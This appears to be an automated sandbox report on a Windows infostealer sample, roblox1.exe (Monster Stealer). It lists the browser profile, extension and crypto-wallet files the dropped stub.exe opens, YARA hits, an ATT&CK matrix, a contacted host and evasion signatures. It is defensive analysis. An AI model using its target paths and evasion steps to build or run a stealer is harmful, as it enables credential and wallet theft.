                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.filesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfndJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f463e7a-ef1f-4e71-ae85-88471a72b3d6Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareportingJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b79425d0-2f84-41d2-84d3-9f598259534dJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.filesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\881ae04a-fa90-4a62-8eee-5ae000467040Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chromeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BookmarksJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons MaskableJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-walJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons MaskableJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons MaskableJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\security_stateJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldoomlJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archivedJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\697416b8-55c0-41ac-9636-a06aa38f99e9Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\IconsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.filesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pingsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons MaskableJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieafJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b7e6c706-6d19-4b9e-9c37-e5ee870c2129Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.defaultJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibagJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons MonochromeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons MonochromeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\af2cf244-1bda-453b-baae-9793e72e9be8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\minidumpsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior
                  Yara detected Generic Python Stealer
                  Source: Yara matchFile source: 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1951447889.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: roblox1.exe PID: 1364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: stub.exe PID: 3428, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, type: DROPPED
                  Source: Yara matchFile source: 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1951447889.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: roblox1.exe PID: 1364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: stub.exe PID: 3428, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, type: DROPPED

                  Remote Access Functionality

                  barindex
                  Yara detected Monster Stealer
                  Source: Yara matchFile source: 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1951447889.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: roblox1.exe PID: 1364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: stub.exe PID: 3428, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, type: DROPPED
                  Yara detected Generic Python Stealer
                  Source: Yara matchFile source: 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1951447889.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: roblox1.exe PID: 1364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: stub.exe PID: 3428, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure1
                  Valid Accounts                  		341
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		21
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		11
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts112
                  Command and Scripting Interpreter                  		1
                  Valid Accounts                  		1
                  Valid Accounts                  		11
                  Deobfuscate/Decode Files or Information                  		1
                  GUI Input Capture                  		2
                  System Network Connections Discovery                  		Remote Desktop Protocol4
                  Data from Local System                  		12
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Service Execution                  		1
                  Windows Service                  		1
                  Windows Service                  		2
                  Obfuscated Files or Information                  		Security Account Manager2
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  GUI Input Capture                  		2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  PowerShell                  		Login Hook11
                  Process Injection                  		1
                  Timestomp                  		NTDS37
                  System Information Discovery                  		Distributed Component Object Model1
                  Email Collection                  		3
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets541
                  Security Software Discovery                  		SSH1
                  Clipboard Data                  		Fallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials2
                  Process Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Valid Accounts                  		DCSync141
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                  Virtualization/Sandbox Evasion                  		Proc Filesystem1
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                  Process Injection                  		/etc/passwd and /etc/shadow1
                  Remote System Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing31
                  System Network Configuration Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577530 Sample: roblox1.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 81 restores.name 2->81 83 ip-api.com 2->83 99 Sigma detected: Capture Wi-Fi password 2->99 101 Multi AV Scanner detection for dropped file 2->101 103 Multi AV Scanner detection for submitted file 2->103 105 7 other signatures 2->105 10 roblox1.exe 48 2->10         started        signatures3 process4 file5 65 C:\Users\user\AppData\...\_quoting_c.pyd, PE32+ 10->65 dropped 67 C:\Users\user\AppData\...\_helpers_c.pyd, PE32+ 10->67 dropped 69 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 10->69 dropped 71 31 other files (29 malicious) 10->71 dropped 123 Found many strings related to Crypto-Wallets (likely being stolen) 10->123 125 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->125 14 stub.exe 27 10->14         started        19 conhost.exe 10->19         started        signatures6 process7 dnsIp8 85 ip-api.com 208.95.112.1, 49712, 80 TUT-ASUS United States 14->85 87 restores.name 135.181.65.219, 443, 49722 HETZNER-ASDE Germany 14->87 89 127.0.0.1 unknown unknown 14->89 73 C:\Users\user\AppData\Local\...\Monster.exe, PE32+ 14->73 dropped 75 C:\Users\user\AppData\...\system_info.txt, Algol 14->75 dropped 77 C:\Users\user\AppData\...\process_info.txt, ASCII 14->77 dropped 79 3 other malicious files 14->79 dropped 91 Multi AV Scanner detection for dropped file 14->91 93 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->93 95 Tries to harvest and steal browser information (history, passwords, etc) 14->95 97 5 other signatures 14->97 21 cmd.exe 1 14->21         started        24 cmd.exe 14->24         started        26 cmd.exe 1 14->26         started        28 12 other processes 14->28 file9 signatures10 process11 signatures12 107 Encrypted powershell cmdline option found 21->107 109 Bypasses PowerShell execution policy 21->109 111 Uses netstat to query active network connections and open ports 21->111 121 3 other signatures 21->121 113 Overwrites the password of the administrator account 24->113 115 Gathers network related connection and port information 24->115 117 Performs a network lookup / discovery via ARP 24->117 30 net.exe 24->30         started        33 systeminfo.exe 24->33         started        35 net.exe 24->35         started        45 15 other processes 24->45 37 WMIC.exe 1 26->37         started        119 Tries to harvest and steal WLAN passwords 28->119 39 powershell.exe 11 28->39         started        41 taskkill.exe 1 28->41         started        43 mshta.exe 28->43         started        47 9 other processes 28->47 process13 signatures14 127 Overwrites the password of the administrator account 30->127 49 net1.exe 30->49         started        51 conhost.exe 30->51         started        129 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 33->129 53 WmiPrvSE.exe 33->53         started        55 net1.exe 35->55         started        131 Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes) 37->131 133 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 37->133 57 quser.exe 45->57         started        59 net1.exe 45->59         started        61 net1.exe 45->61         started        63 net1.exe 45->63         started        process15

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  roblox1.exe55%ReversingLabsWin32.Phishing.MonsterStealer
                  roblox1.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe55%ReversingLabsWin32.Phishing.MonsterStealer
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_asyncio.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_bz2.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_cffi_backend.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ctypes.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_decimal.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_hashlib.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_lzma.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_multiprocessing.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_overlapped.pyd0%ReversingLabs
